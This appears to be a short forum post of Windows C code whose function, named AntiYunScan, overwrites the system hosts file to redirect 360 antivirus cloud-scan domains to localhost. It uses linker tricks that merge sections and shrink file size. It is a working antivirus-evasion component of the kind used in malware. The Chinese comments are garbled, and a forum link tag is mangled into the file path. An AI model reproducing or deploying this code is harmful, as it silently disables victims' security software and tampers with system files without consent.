(243107) 20:53:33
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/merge:.data=.text")   
#pragma comment(linker, "/merge:.rdata=.text")   
#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/subsystem:windows") 
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
int AntiYunScan()
{
char host[MAX_PATH];
GetSystemDirectory(host,MAX_PATH);   //õhostĿ¼,ɱ
strcat(host,"[url=file://drivers//etc//hosts]\\drivers\\etc\\hosts[/url]"); 
SetFileAttributes(host,FILE_ATTRIBUTE_NORMAL);
FILE *file;
file=fopen(host,"w");//дķʽļ"w"--write
char mianyi[MAX_PATH]=
   "127.0.0.1 localhost\r\n"
   "127.0.0.1 stat.360safe.com\r\n"
   "127.0.0.1 qup.f.360.cn\r\n";
fputs(mianyi,file);
fclose(file);//رļ
return 0;
}
void Torrent()
{
AntiYunScan();
ExitProcess(0);
} 
